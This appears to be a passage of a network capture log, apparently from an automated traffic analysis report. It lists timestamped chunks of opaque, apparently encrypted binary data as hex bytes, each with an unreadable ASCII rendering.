                                                                          2023-01-30 12:39:17 UTC102INData Raw: ab da f9 68 3b 3c 41 a3 bb 60 5b 2c e8 91 07 1a a0 ff 19 23 12 ef 72 9b 1a f7 4c 74 64 92 c0 18 5b 53 3e 71 8a ec d6 ed 2e 7c bf c7 ca 68 bb 2b bf be fb 3a 52 53 b3 e2 b8 97 a0 3e 2f 7c c9 cd cb 42 4c 96 d9 a0 e3 a5 47 da 73 0d 06 76 33 49 55 d8 90 92 a6 66 fa 56 b8 6d 56 93 3a 2d 93 5b 55 15 17 83 3f fb dc 42 de af 6a 7d 06 68 02 b6 61 ff 18 d2 cc cf a5 d4 81 2a 1e 4f 00 12 0d 51 e5 f5 08 d0 32 cf 1e 3f f5 7b 5e a0 12 e6 10 47 c1 30 62 9c cb c1 ff a2 9d d5 11 17 74 d7 ad 2a 1d 3f 52 e4 8c 4b 60 7d 42 72 e3 a2 af cb ee b3 3d 53 ee 6b cf a9 30 d9 5a 6f d4 c6 27 2d fc 47 d1 12 f7 fb 4c 06 8e b9 85 4e d1 e2 03 0e a7 3c 74 1f 10 68 f5 42 36 17 9f 00 37 1d 54 68 f2 15 ba bc 25 76 24 1c cc 33 93 d6 3f c3 35 1e 63 4a 72 cd 45 1f e7 d6 22 23 de 40 08 a5 e2 ba 01
                                                                          Data Ascii: h;<A`[,#rLtd[S>q.|h+:RS>/|BLGsv3IUfVmV:-[U?Bj}ha*OQ2?{^G0bt*?RK`}Br=Sk0Zo'-GLN<thB67Th%v$3?5cJrE"#@
                                                                          2023-01-30 12:39:17 UTC109INData Raw: aa ac 5c 1b b7 56 5a fb 93 cc ba 6f 3a fb 92 f4 1f f9 fd dc 7a 63 8d 29 80 d4 90 2c 50 e3 11 27 8a 31 00 f2 a9 ed 63 17 4e 85 d1 35 0b a6 b8 04 40 1b a8 50 6c 1b 59 2d c2 b4 74 f4 81 e5 74 fe f6 22 7b ff 9e 9e 3d e5 c9 b0 97 4c e3 46 56 24 aa 0a b1 9d 41 6a 94 b6 fa de b4 d5 9b 06 ea 26 ea 99 77 06 92 f5 6b ef d9 1c 69 d1 76 b5 24 97 dd 0c 00 9d b2 91 ce 61 45 18 91 2d 80 d0 ba 82 fa da 17 5b 51 56 d9 c2 90 06 ec 0d 03 eb a4 3a 2e 87 6d 0d 80 d9 f9 eb b2 f1 36 02 ce 6c e7 25 87 a6 3d 82 c3 de 2b e8 7b 4e 97 21 a7 7b a7 9f c5 f9 55 3b dd 96 99 79 80 be cb c3 03 1b 8e a8 58 af a8 15 63 db f5 20 1c fe b6 93 9b 07 cc 9e 61 bf 3a 69 8b 91 a1 1d 8c 57 e7 d6 3a b6 10 83 a6 7f 09 b9 70 34 0c c2 20 59 81 63 99 10 5f 10 f0 a1 51 27 de 70 12 2e fd f4 45 a6 bb 85 c1
                                                                          Data Ascii: \VZo:zc),P'1cN5@PlY-tt"{=LFV$Aj&wkiv$aE-[QV:.m6l%=+{N!{U;yXc a:iW:p4 Yc_Q'p.E
                                                                          2023-01-30 12:39:17 UTC117INData Raw: 84 bd 60 05 74 e6 9c 7a 53 95 77 ad c8 52 2d 9a 91 c5 b0 0f 90 26 15 00 7d 87 3a ab 91 a3 e0 2f 7e 8c 58 44 31 bc ec 39 fc d8 49 11 f1 0b fa 16 bd c5 06 26 8f bb 03 c0 ac 8e 52 5a 93 d0 c0 41 06 8c d5 4e bd 78 2e f8 85 08 88 c5 66 02 9d 60 c8 89 0c 7e 8d c3 67 c6 df 0a 00 55 c5 31 47 0f 9a c5 eb f2 99 59 8c 9a e9 5e 3e 63 db 88 52 36 4a 45 e2 97 03 08 d4 0d ba b8 c9 53 03 c2 6b 00 3b db 5e 0b ef 42 7d cf e2 be 91 a6 36 e9 6a b2 7e 88 58 cc c4 a1 c5 f9 cb cc 08 17 ec ba 91 04 8f 12 45 0b a3 5f 22 5c 10 a0 da cb c6 d5 16 26 4f c0 64 08 d7 ef fa 40 70 f7 c5 fe 6f ac e6 77 92 d1 d6 ba 31 b6 45 f1 4a 81 f4 27 ec 88 97 e8 90 aa a6 af 9c 34 cd fd 6d 15 4a fe 42 59 c6 f1 7d 70 86 7a 56 b6 15 f5 3e 75 a6 b3 15 0a 6e 42 92 83 9d b1 e1 68 d5 54 8a ec 10 cb db 14 88
                                                                          Data Ascii: `tzSwR-&}:/~XD19I&RZANx.f`~gU1GY^>cR6JESk;^B}6j~XE_"\&Od@pow1EJ'4mJBY}pzV>unBhT
                                                                          2023-01-30 12:39:17 UTC125INData Raw: 92 b4 d6 5a 4a 1b 01 35 d9 84 95 c2 85 39 31 2a a1 c4 63 56 25 53 00 c8 63 23 bb 33 65 d2 09 47 12 13 7c 8a 39 44 41 e1 f3 b8 4e 1f ea bd fc 14 b2 93 12 f6 8e d1 c8 56 e9 2c b4 56 22 86 e5 57 60 0b a2 7c 61 3c d7 7e b0 3d a0 b3 a8 29 59 67 32 19 b0 2a eb 49 b3 9f a9 3b 77 d8 d8 fd db 75 9e de c6 34 ed 71 74 c1 e8 a6 ec 33 ae 5b 7f b1 10 07 d2 7f 45 ed fb 1a 2d 5b ff 7c 76 b5 29 87 98 18 66 79 82 ef 80 0c 3a d6 b1 78 df 26 a6 44 20 73 22 40 88 23 76 8e df b1 26 1e 59 79 e7 5f c9 3b 69 bc 3e db 6c fc 8d f9 7a 60 53 8b 1d 2e 09 58 99 14 8a cd 10 b5 10 76 d1 7d 20 09 80 f4 6e 11 87 4f 4d 05 81 04 e7 7f c2 67 62 50 12 43 b0 c1 32 1e dc 84 65 25 47 98 80 97 ec 2e 7e e3 de c5 23 c9 73 ab fb c1 39 39 49 99 3c f6 c2 25 03 40 e8 e7 04 ed a3 d0 a7 a6 7b 02 9b 1e c4
                                                                          Data Ascii: ZJ591*cV%Sc#3eG|9DANV,V"W`|a<~=)Yg2*I;wu4qt3[E-[|v)fy:x&D s"@#v&Yy_;i>lz`S.Xv} nOMgbPC2e%G.~#s99I<%@{
                                                                          2023-01-30 12:39:17 UTC133INData Raw: 74 28 f1 80 25 37 00 2a c5 26 93 f8 3c b9 b4 e7 1f 7b 83 40 eb 91 2a f1 33 ad 78 2c 4d a4 4b 8b 7c 6b c2 11 2d 4b f3 fc f7 fa c9 b3 3c 94 db 63 be c4 ff 03 37 12 3a 43 56 82 d1 37 23 b3 18 81 bb 47 04 f5 2c bf cf d0 c7 1b bf 6e a7 f6 2f ba f1 55 ad e7 a9 b8 2e 9d 4b 3a bb e4 b7 75 5c 52 cb 0b 4f 79 66 81 5d 76 5e 21 92 a4 c8 76 57 12 08 6a 05 03 49 98 d2 35 dd 88 20 e8 3b 73 30 84 8c 4f 20 89 23 7c bd d8 7c 5a 22 b8 ae 24 72 24 ee 5a 7f 30 7a 5c 03 d4 c9 a2 24 f1 28 38 fe f0 27 3d 8f c7 f2 35 e9 62 2b 47 c7 14 cd 4f bc a0 31 39 03 52 1a 68 eb 46 1a 24 12 71 df 78 0e ff 41 0d 5f fe 2b b8 fc 10 ae 56 24 d3 0f 26 d3 f7 b5 51 71 f2 45 ef a5 97 34 5d 30 9f 6a 20 ae 7a cc 26 e7 ba 09 79 99 a0 be 84 f1 bd 77 02 a6 0b 58 b1 99 5e 45 b6 22 ad da 53 16 8a 05 50 59
                                                                          Data Ascii: t(%7*&<{@*3x,MK|k-K<c7:CV7#G,n/U.K:u\ROyf]v^!vWjI5 ;s0O #||Z"$r$Z0z\$(8'=5b+GO19RhF$qxA_+V$&QqE4]0j z&ywX^E"SPY
                                                                          2023-01-30 12:39:17 UTC141INData Raw: 65 6b 4b 26 51 bd 54 1e 58 78 3a 0c 61 06 4c de 49 85 76 e5 1e 1a 2b d5 15 cc 09 5b 27 2b 0f db b7 39 61 24 4c f3 fe bf 77 08 b3 d7 37 07 d3 33 76 04 a8 02 8f 07 ae 01 e8 64 c4 62 5a bf a6 ff 25 2a b8 2c b1 15 95 d3 64 73 f8 c6 8d 50 f0 25 47 99 05 df 49 41 2b 7e fa 62 91 55 0f 19 bd 49 a2 c0 07 43 c6 3f 4b f1 d3 35 06 d4 cd 25 ce a9 40 bc ff 6c 71 eb 5b c7 e6 e0 7c a7 fc df 85 ca f3 db fb f5 79 87 7a 7c 6e 36 93 84 4c cb 1f 03 fa 6a 32 e5 c2 31 40 44 ce 5c 15 ab 85 35 d3 ff 31 ca 7f 20 c8 3c 61 b0 6a 83 87 66 a7 bd b7 c4 c8 5e 39 80 a5 fb 52 94 a8 82 8d 13 e4 35 03 64 a5 ac e3 5d 0b fb 7b 13 48 6d d4 0b 6c 22 92 88 77 e2 60 1b 9e b4 d3 30 e8 15 11 bc 8b 00 5f cd 5d d5 b5 3a ac ca b1 32 6f 03 c8 b8 85 21 02 a4 db 08 d6 d5 dc 55 ba 4d 4b a7 aa 61 94 b6 6a
                                                                          Data Ascii: ekK&QTXx:aLIv+['+9a$Lw73vdbZ%*,dsP%GIA+~bUIC?K5%@lq[|yz|n6Lj21@D\51 <ajf^9R5d]{Hml"w`0_]:2o!UMKaj
                                                                          2023-01-30 12:39:17 UTC148INData Raw: 2f 4a b2 ad c9 2c 39 0b aa e4 9f 87 26 8c de bb dd c9 3e 54 19 08 dc 66 83 8d 60 73 51 78 2a 28 dd 0d 26 20 51 be e0 38 6f 7a e1 c5 33 38 11 4c c4 54 76 dc be b1 1f 2d 23 45 0b 65 23 20 c2 b4 5e 05 d8 4c 7a 42 4d ba 60 ea fe 8a b1 fd 5b 03 fa 0a 6b b4 cf 69 37 32 ac 45 87 fc a5 8c ce 92 5e 68 3c 41 7f 22 ea 0f 7d 08 30 3f 42 c3 ac a6 a2 1f f8 11 76 d3 c5 72 10 bc 22 32 2f ff 01 20 a7 3e 0c 12 32 9e c6 20 06 6f 76 0e 1b a0 20 59 44 9b 01 30 a3 63 09 ee 66 b8 6d a0 a0 ca 8d aa 94 24 f2 06 b6 38 81 86 98 ae 91 0f a9 9c 96 71 90 77 85 b3 4b 9c 06 a7 bb c6 c1 37 c6 09 95 a2 31 a2 9b 87 6f cc e4 6f dd 27 d6 c6 b5 4c c8 c0 94 e1 62 86 39 a5 28 a9 33 3b 22 7f 22 ee ad 59 51 ea 0b b5 8d ab a2 7a 60 3d d7 e4 b5 cb e1 5c 1a 4c 96 9e ea 73 bc f5 49 4b 90 d2 87 2b c3
                                                                          Data Ascii: /J,9&>Tf`sQx*(& Q8oz38LTv-#Ee# ^LzBM`[ki72E^h<A"}0?Bvr"2/ >2 ov YD0cfm$8qwK71oo'Lb9(3;""YQz`=\LsIK+
                                                                          2023-01-30 12:39:17 UTC156INData Raw: e6 3f a6 e2 81 d5 e5 ad 12 2d 22 cd a6 54 ab ae 96 2d 74 81 d1 3c ee 3b f4 78 bf 65 5b 3a 3a 05 af 48 b3 d6 39 2a 45 3d c9 52 92 62 8d 3c 33 5d fc 81 4c 3b 8c 5e 54 f3 2a e5 bb b7 3e 33 f8 87 fd 7d 46 e9 0c 1d bf 0b ae 06 a5 c0 7b d9 64 e3 b9 dc 8d e4 7e 91 8b 5f e1 2a 51 7d 24 cb 28 a6 c1 4b 29 a2 a0 16 42 53 d8 f8 b2 a7 20 28 73 d8 e7 df f5 41 f9 03 c0 e8 f4 85 00 73 45 1e 19 96 eb 90 66 19 82 70 b9 e3 63 57 bf ea 42 ff 7b 3d 2c dd 0d 98 90 75 45 a9 65 d3 6d 3c fc f0 cd c3 0c 5d 4b 30 3b 1e 3d e8 0a e0 76 d3 92 36 13 2c 48 19 f2 f0 18 86 2a 00 f4 36 fa af 4a fd 46 44 46 26 45 11 e0 9b 74 f9 46 03 85 98 15 1f 88 1b 3c 65 b9 31 06 39 10 35 15 c7 18 43 17 bd 35 59 3e 17 b8 bc e5 89 7b e3 00 2a 9a 32 41 02 3b 1d b5 fb 52 18 28 a0 e6 66 b8 5c e6 12 4c 39 43
                                                                          Data Ascii: ?-"T-t<;xe[::H9*E=Rb<3]L;^T*>3}F{d~_*Q}$(K)BS (sAsEfpcWB{=,uEem<]K0;=v6,H*6JFDF&EtF<e195C5Y>{*2A;R(f\L9C
                                                                          2023-01-30 12:39:17 UTC164INData Raw: 86 f2 0c bd 7d 32 27 1a 7d 81 db 16 de 65 ba 83 40 9b 5d 7a 0a c7 3f bf 14 78 11 83 55 43 b9 6f 46 0f c1 4b 44 58 00 81 12 8e 0e 6a 67 1b 1b 2a 68 be d2 38 72 f3 0b 8a 97 52 07 e6 5f 1a c4 00 35 b4 9c 2f 21 5b 66 1d e6 52 79 ce 3f 63 2d 05 8b 6e b0 36 80 a6 c2 db 4e f8 0a b5 0b a5 da 2b 82 7d 6f 09 c3 20 4c 53 e8 25 21 a0 20 d2 cb 07 e2 6c 81 98 44 13 91 10 7b 8a 51 af 5c dc ce 7f 60 80 9a 0a 07 4c 42 13 f4 a2 c1 63 0d 15 4d 1e 5c bd 64 6a 0b 20 fb c7 f0 25 74 0a 3b 71 1b fa d4 4c 1f 4b c7 ae f1 c4 02 1d 60 17 ac 7b 78 21 03 00 66 10 3b 81 e6 5b 23 52 4c 0e 62 f4 a7 05 7a 0b 68 79 5b cb ca 0e 05 ab 06 cd 89 13 96 92 aa 21 dc 1c 10 8e 5c b3 9c 95 a4 fc 63 67 e6 fb 71 82 57 65 1c 05 5f 3c 50 ca 3d 46 2f 07 25 3e a4 93 aa fa 04 16 24 f7 b8 e7 95 56 1a 87 c4
                                                                          Data Ascii: }2'}e@]z?xUCoFKDXjg*h8rR_5/![fRy?c-n6N+}o LS%! lD{Q\`LBcM\dj %t;qLK`{x!f;[#RLbzhy[!\cgqWe_<P=F/%>$V
                                                                          2023-01-30 12:39:17 UTC172INData Raw: 97 87 14 c4 bf 2e 6f a0 ed 65 00 32 29 8c 1a b6 57 3b fa 40 8a e1 5e 9f 02 a1 fa 4c 54 6c ed d0 49 ed 9e 78 c2 9a 34 e7 73 17 8c 0b 7f 74 58 6d 79 e7 e0 5c a1 cc 1a a3 d1 85 f5 e9 59 34 f7 4d 8b 5d 77 c8 f0 78 2a 0b 69 50 d1 39 81 01 95 5b 76 19 59 ed 69 72 be 51 f2 0b f0 8c 7b 4a a4 32 91 67 23 aa c1 46 80 f5 7e 95 5b 4a 5e b1 4f bf 4f c1 cb 9c 7c 64 fc ca 2c e0 27 51 e6 a2 3a 28 3d 36 58 a6 ae 89 14 15 9b ef aa 9f 4c bb 83 86 32 a6 fc e4 fc a1 82 a1 62 3f 90 c8 b4 e4 2e b8 4e f9 d2 32 b3 1d ae 89 61 12 24 d9 f8 0d d9 4f 39 a0 bb b8 29 d6 54 19 92 15 3c f2 7d cb ab 3c c7 7a ee d3 17 09 60 88 c2 5e cf 63 67 2b 8e a8 67 53 81 7f ec cf 37 c5 e4 c6 4a 1a 4d 46 7a fb 26 e1 3d 9b 2d 9f 46 ca 88 16 7b e6 84 67 d2 a2 51 62 0f 71 41 6d 9c 0a b3 91 0e a1 a0 b6 07
                                                                          Data Ascii: .oe2)W;@^LTlIx4stXmy\Y4M]wx*iP9[vYirQ{J2g#F~[J^OO|d,'Q:(=6XL2b?.N2a$O9)T<}<z`^cg+gS7JMFz&=-F{gQbqAm
                                                                          2023-01-30 12:39:17 UTC180INData Raw: 2f 10 26 f7 3f 0a 49 53 56 fa 79 d3 a7 7b 3a 58 83 9e 72 e0 9f c4 81 d3 d8 56 0c 90 b0 af 2a ce 36 95 31 07 e6 28 e2 ab bd 4e bf 08 16 b9 a0 5c 72 12 32 dc 59 4c a4 4f 04 13 0b 6b 60 b1 7d 82 e4 7b 0f 86 40 b0 55 6f fc e2 0a 44 86 67 6b a2 92 50 6c ba 84 08 27 78 61 df b5 8d 58 d4 6c 32 35 d9 67 7c d4 f8 8c ce 85 3b fa 72 2b b8 45 09 60 da c6 c2 9c ea f7 84 3d a5 81 26 ee 27 04 5b 8d 4e 66 c5 37 0e 43 68 10 72 5c b4 f2 8b e3 4d 1b 81 3b 82 a7 41 f0 e4 5c 03 1f e8 44 15 3d de f1 13 49 1f c9 94 45 54 c6 19 21 91 bc 54 9f d4 75 f7 a5 dd 40 57 81 56 e1 c7 80 bb bc 6d 1c a3 de ff 67 cc 64 e6 48 fc 5c 06 eb 49 50 bd a9 27 b4 de 56 fd cf 99 36 6c a7 aa 18 0d 54 75 d8 02 cd 02 1f c1 54 d5 09 81 41 76 d0 ba 14 01 07 64 5e cd ee 3f c8 64 e2 56 54 5a 4d cf ba 05 08
                                                                          Data Ascii: /&?ISVy{:XrV*61(N\r2YLOk`}{@UoDgkPl'xaXl25g|;r+E`=&'[Nf7Chr\M;A\D=IET!Tu@WVmgdH\IP'V6lTuTAvd^?dVTZM
                                                                          2023-01-30 12:39:17 UTC188INData Raw: da 94 67 11 46 ff 62 cf 0b 4c 5d 1f 3f 49 a1 95 88 6a 5f 36 a7 72 72 92 68 11 3a 96 40 73 d9 8b 0f e8 1d 3e cc ae 37 b5 f1 ab 33 69 cd 84 51 5e 2c e0 0a f2 0b cc 82 8b f4 6d 2f a9 95 b5 4f 53 54 09 fc d5 5b c4 e5 39 c8 62 8f 4d 76 ae 0f 16 be fc e5 a0 71 5e bb 81 75 33 9d 7b 0b a7 c2 63 e8 51 ff eb e1 94 ca fe c1 e2 4a c1 e2 3f 24 dd f6 55 52 6c f2 38 d0 01 0d c7 bf c3 f9 e1 8e 82 f9 09 d6 c3 77 3e 1c a1 f1 4f 8a c5 63 53 16 06 27 db 0c 71 92 6e cf 80 1d 0f 16 0f 54 d9 11 96 c8 20 13 b2 4d 7a 6f b5 f1 08 37 72 f4 33 5c 3f fc 27 35 c8 52 7e 4c 03 40 70 8c 20 5c 7b 3b ca 24 1d 24 b3 7d a5 bb 1e df 7f ef d0 ca 58 92 3d 8a 93 a3 56 16 2a 32 ec 27 73 85 df 7a e5 99 bc 4a e8 ca 23 53 e2 1a d2 a6 28 26 05 75 2e c7 0f ad 39 19 ac 8a 36 05 50 ca 9c 17 8e 5b ea 32
                                                                          Data Ascii: gFbL]?Ij_6rrh:@s>73iQ^,m/OST[9bMvq^u3{cQJ?$URl8w>OcS'qnT Mzo7r3\?'5R~L@p \{;$$}X=V*2'szJ#S(&u.96P[2
                                                                          2023-01-30 12:39:17 UTC195INData Raw: 9f 4d b4 fe b7 18 0f 4b 1d 12 11 dd c1 0a e9 6e 47 f0 96 89 d7 4f ca 99 4f af 3a ba 33 04 91 f4 a4 cf e8 0a 94 e1 9c 18 75 89 4d 14 96 7e ad e8 07 98 28 2d 30 88 ab b5 4c a3 da 19 93 81 a0 15 14 d1 d5 31 ba c5 1e 70 aa 69 b3 69 ac 50 a4 0b 54 60 e2 8d 95 43 45 fd b1 2f d6 91 23 72 e4 10 45 70 02 9d 55 76 99 16 f5 98 c4 16 ae 59 b5 71 e4 0e 9a 54 c2 d6 42 7a 52 6f 8b 3d 2d a7 30 5a cb d1 d6 2f 4c 41 2e 1b 80 e4 33 29 c1 bb 9d 69 b3 a0 d4 69 b4 1b 7f 33 65 25 8d f2 72 f9 86 aa b9 df 73 e1 d8 33 e3 16 79 0f 9b da 25 51 4b e0 f6 21 be 9d b7 08 2c 6e b8 4b f7 12 7a 33 82 17 2b 3d 9e eb 5d 81 b6 03 46 9c 5c 91 c7 eb 34 6e c8 2b 58 05 13 6a b7 99 28 8d 3b 6e 81 6c 80 a8 af 74 5d 32 08 97 e2 c6 f6 ff 68 9e d1 16 7a 93 23 6f f8 e7 8a 31 37 33 a3 75 10 0e e6 c4 d8
                                                                          Data Ascii: MKnGOO:3uM~(-0L1piiPT`CE/#rEpUvYqTBzRo=-0Z/LA.3)ii3e%rs3y%QK!,nKz3+=]F\4n+Xj(;nlt]2hz#o173u
                                                                          2023-01-30 12:39:17 UTC203INData Raw: eb c8 47 5d ea 53 e1 7e ef d3 6a d5 23 8e 2f a9 6c c2 4b 0a 30 62 7b 81 c6 82 6b 1a fa 8e 07 40 7a e0 46 54 b3 06 73 1d b9 32 7b 88 63 7a bc 3a 97 16 86 a1 33 d3 cb 4a 34 ee c5 e0 68 0c 05 67 60 b9 06 5c 36 dd bc 60 8c 56 e4 15 9f dc c4 35 45 dd 6c 86 da 42 f5 0c e0 10 80 a3 3e ee fd 51 67 3b 0d c9 5c 92 ec ff 23 6d 49 00 3f 62 b7 bf cc 25 8f 4c 0d 7a 17 16 57 c7 a4 7e 68 b6 dc 96 39 05 fb 1b d1 ab b1 09 e0 04 09 3e 11 2f 44 79 b9 82 47 8d 3c 61 e7 5b 2c 2c 07 92 e0 c3 07 77 9a d5 2c 1c b3 50 8f 63 fd a6 b5 d6 6b d0 9d 9c 0e 9c 85 e8 bc 37 3f 7a cd 36 6b 2c 7a f2 bc f6 00 23 aa a7 b5 21 ef 60 71 8f 62 a3 2d 57 00 7b 74 d3 8a cd 49 23 99 17 47 4e 4e e0 d1 90 be f1 3a 6b c2 cd ff 79 3c b0 5e 72 ca ea 70 08 c8 d6 c9 7e 60 f0 1c 4f d3 84 8e bf d1 7a 10 8a 72
                                                                          Data Ascii: G]S~j#/lK0b{k@zFTs2{cz:3J4hg`\6`V5ElB>Qg;\#mI?b%LzW~h9>/DyG<a[,,w,Pck7?z6k,z#!`qb-W{tI#GNN:ky<^rp~`Ozr
                                                                          2023-01-30 12:39:17 UTC211INData Raw: f4 e4 ac e4 17 3c 63 cb 6b 63 19 b2 c4 51 d7 df 4b 05 86 bd 21 e4 9e 2e 24 2a 7e 9d b3 f5 ec 45 22 17 31 92 3b 4e 84 cf 2c 1c 08 1b 9a 5e 14 4f 9a 3a 5c d1 61 b4 c1 90 d8 ee a5 42 c3 6c 4d d1 dc 41 52 46 01 69 45 15 07 4f 4b c3 01 97 2a 8a 32 bc c5 bb 33 0e 3c 6d ea d8 e5 eb 94 0a d1 e5 fd 05 8f 2c ff 4f 51 82 18 24 b5 ae 32 a1 96 50 bf c3 14 4f 8d 6e c1 3e 8b 9a 52 91 51 32 17 45 02 0c 67 62 3a 03 f8 f8 88 4f 8d 80 ac b8 4b 0a 9b 61 17 41 a4 4e ef 8b 10 dc f0 8c 58 54 e1 4d 6a 1b 37 61 57 ec 27 2d f7 c2 0b ee 16 f8 53 71 cb 45 9a 9f d3 01 d8 db ea 3f 2e 4a dd f0 d7 1d 21 bc 94 9e d6 80 a8 25 a7 cd 6f 08 cc 5f 1f 5d 36 09 57 6b 95 3c e1 bd f3 6e 54 c2 bd 78 45 7b ef 5b cf ac f7 e3 39 50 b3 1e 8b 3e 45 41 98 ea 2b 84 49 2d 50 5b 76 06 27 e0 c7 53 a4 b8 e3
                                                                          Data Ascii: <ckcQK!.$*~E"1;N,^O:\aBlMARFiEOK*23<m,OQ$2POn>RQ2Egb:OKaANXTMj7aW'-SqE?.J!%o_]6Wk<nTxE{[9P>EA+I-P[v'S
                                                                          2023-01-30 12:39:17 UTC219INData Raw: 53 2f 36 cf 31 b5 60 00 0f 48 b2 58 18 d0 e7 38 bc d9 1f dd 4b 93 70 b4 c3 04 a6 9c 62 47 d6 5f 94 c3 27 a2 fa a7 0b b1 ef 1e bc f0 fd ba d9 18 24 12 a9 38 1a b1 0f ad e0 c9 0a 5d 13 16 9b 1d 98 c9 81 82 34 96 3e 39 33 9b 25 43 95 94 e4 b2 27 b4 d3 70 51 71 f2 f1 eb 40 be 82 ad d0 01 19 ac c8 7d 0a 6a 66 9e 36 ba 27 a4 e8 2f ef be 74 5e ee bf 65 2a f5 a1 21 80 53 52 e5 1f 08 20 e5 e2 4a 00 30 10 d3 27 28 60 1c a6 dd 81 f5 cb 4c 73 a1 c1 4d 35 f4 54 01 ea ae b9 c9 b7 86 4b 81 a2 e1 2e d9 65 f7 92 ba b9 84 3a 08 83 b2 ff 18 4d 83 72 f0 38 67 b7 7a 20 ed 50 cf 23 9c f6 88 a8 39 c1 5b f6 72 20 2a bc 62 d4 e3 21 60 ec c6 3b 49 ed 31 0d 1d 72 49 fb d2 25 21 7d 91 ae 59 6a 59 fb af 3b 9a 47 57 69 94 cf a7 c7 f7 c6 6d 5b 5d b1 be 82 a7 c0 10 eb 3a 46 d7 37 6f 26
                                                                          Data Ascii: S/61`HX8KpbG_'$8]4>93%C'pQq@}jf6'/t^e*!SR J0'(`LsM5TK.e:Mr8gz P#9[r *b!`;I1rI%!}YjY;GWim[]:F7o&
                                                                          2023-01-30 12:39:17 UTC227INData Raw: 5e 33 93 40 f2 52 a0 53 22 92 ed 85 1e 57 16 73 3c 6b 10 ce f6 58 bd 6e 54 d4 e0 dc c3 44 5d 25 a8 5c 40 2e b8 ce 67 d1 c7 c4 06 fe d0 58 11 fb 28 56 65 e2 ce 22 25 6b 5f 7e 72 8b 9d 84 e8 25 ce ca 97 33 77 91 a7 bb a5 cc bb 08 67 53 0f 9b 2c ac b1 d0 d8 a9 11 13 93 6a b0 d8 a0 25 d1 3a 07 24 01 0b 76 a2 f5 5a 6b 02 6d fa 5c 6a ae 94 17 b3 39 14 ce 02 f1 1b 3d 04 b4 ac 17 0a 74 e3 ad 3e e8 9b 65 d6 30 98 82 89 39 c3 f7 2b 70 96 ea b6 e9 51 bb ff 12 75 72 38 d1 82 5a de f5 eb 78 08 2d d9 08 7b 74 bd 4a 6e 53 25 07 22 00 d9 3e 8a 0c 4b fa e4 6e 74 b6 bf 9b fc 24 aa cf ea a5 d3 14 23 5a d8 64 6b 12 2b 6f 1f 68 c1 87 a9 68 b9 15 89 c8 a8 00 ab 19 02 04 e9 3b f8 cc b4 b5 05 92 a2 71 b5 ba 1d 7d f7 49 ad 0b 85 98 11 39 f6 73 96 ae d5 a2 d0 f1 35 ed 5e 93 92 df
                                                                          Data Ascii: ^3@RS"Ws<kXnTD]%\@.gX(Ve"%k_~r%3wgS,j%:$vZkm\j9=t>e09+pQur8Zx-{tJnS%">Knt$#Zdk+ohh;q}I9s5^
                                                                          2023-01-30 12:39:17 UTC234INData Raw: 81 a9 5f cb 95 6a 5f d3 4b d2 d7 a9 27 32 6e 46 a1 ce 81 fd 3b f4 0b 0d a9 2d cd 1f 73 42 3c fd d9 fc 40 26 2b e0 14 ec 98 f2 cc 8c e3 36 43 12 6e 09 46 6c ec db 50 19 28 62 2a 8a 7d 15 c2 30 5a ec 6d 35 ff aa 1c 55 a5 62 c2 7a 5e 0e 66 33 2a 46 c6 10 19 f0 58 66 e7 1e f3 ab c1 5e 86 c1 12 b9 cc 2d c1 d3 1e 22 db d2 6e 32 54 97 e5 c6 84 c0 50 ad 60 e1 32 33 1d 4d 53 6e 63 0d 4e 1a da 13 ca 19 83 c1 70 5d 72 ac 29 04 0e 11 65 91 74 39 60 c7 3c 90 56 a9 b2 a1 bc 24 d5 c5 23 40 5e f0 fd 77 8d f0 27 41 c7 c6 77 42 2f 7c 2c 6e 3d 2f 06 02 d5 8e c0 51 8d f2 ac 8e bd 1b 95 93 63 0a 68 54 a1 40 f2 7f 88 99 bf 37 47 af fa 20 bc 9a 0f 8f ac 8a 54 d5 a6 a6 37 00 e2 fe 45 63 25 c3 1c 94 42 1e 70 42 8d 6f 59 20 22 5c 68 d7 7b 01 d9 c0 e4 b2 33 9d 39 ba 16 78 1a b0 50
                                                                          Data Ascii: _j_K'2nF;-sB<@&+6CnFlP(b*}0Zm5Ubz^f3*FXf^-"n2TP`23MSncNp]r)et9`<V$#@^w'AwB/|,n=/QchT@7G T7Ec%BpBoY "\h{39xP
                                                                          2023-01-30 12:39:17 UTC242INData Raw: 0c 2b cc a8 54 ce eb 10 66 fb 43 ae b0 53 a6 1e e7 c5 5c 52 81 9c b0 a1 57 00 e2 51 fe 24 0a cd b2 20 02 e7 85 14 93 d7 2c ce e1 43 b7 82 62 23 e0 79 2c 13 94 d5 c3 3f c2 6f 97 6e 11 7c 9f 63 f7 03 21 84 ed b0 02 b0 66 13 8d cd 73 9b d7 b4 06 80 4c e7 3d a9 50 98 ee e3 5e 88 2d 15 dc 98 5b af c4 3a 63 7a ed bb 78 ec aa 93 68 a2 61 7c ea 06 c3 9c aa 7d 34 fe b2 d5 23 c6 e9 d5 1e 7a 4e f3 ed 8a 03 c2 44 72 fd b9 a9 99 29 52 62 8d 6f c9 8b 7f f6 6c 3f 1f c2 b5 f6 ec 67 79 a4 a4 47 09 0b 7d 45 9d d5 43 1c ca 95 2a 4a 6a 3f 00 98 e3 a3 9e 5e 0b 0c b3 6d 8e b4 23 be 2b e2 5b ce 26 10 b1 b8 07 10 aa 4a f3 51 b8 cf 25 1f db 38 02 00 b7 51 99 76 03 b6 1f 31 89 ed 10 c3 94 cf f0 3a 08 d4 d3 57 79 48 d2 4c 03 1a 58 40 bc 58 0c 9b b4 e3 0b c7 70 20 03 fc 33 9d 28 f9
                                                                          Data Ascii: +TfCS\RWQ$ ,Cb#y,?on|c!fsL=P^-[:czxha|}4#zNDr)Rbol?gyG}EC*Jj?^m#+[&JQ%8Qv1:WyHLX@Xp 3(
                                                                          2023-01-30 12:39:17 UTC250INData Raw: 99 2c 3a 38 4c df 99 68 d0 22 10 73 ca 7d 91 28 be ad 18 fb 32 73 95 d2 21 92 60 2d 70 e3 06 8f 1c c5 2f 66 b9 90 74 d0 9a ca d7 f7 02 3b 76 c3 0f 8e 65 ba fa 74 b3 f5 4f 79 f4 ce ea d7 f4 0f 6b 6b 22 0f a0 29 91 2f 04 0f 42 90 bf 11 5e a0 2b 49 6e de 59 d0 0d 4d e8 12 73 cc b3 ac 35 62 be 9c 5c 3f 33 7b 8d 3b a4 89 4d b1 ec b2 27 f2 65 3a 44 f9 5c 3e 81 74 6b a5 0a 4d 41 b4 1e 48 45 c2 78 dc df cf a7 a0 80 e7 09 55 da e5 de 24 e2 0a 9d 83 ac 63 98 92 22 86 9e 3b 7f af 33 cb 89 1f 2d d4 bc 9d 52 3d 4f 26 7b 69 86 9b 76 d4 e3 e0 10 d0 43 21 04 45 91 5d 37 2e ea 46 50 66 fc 43 8f 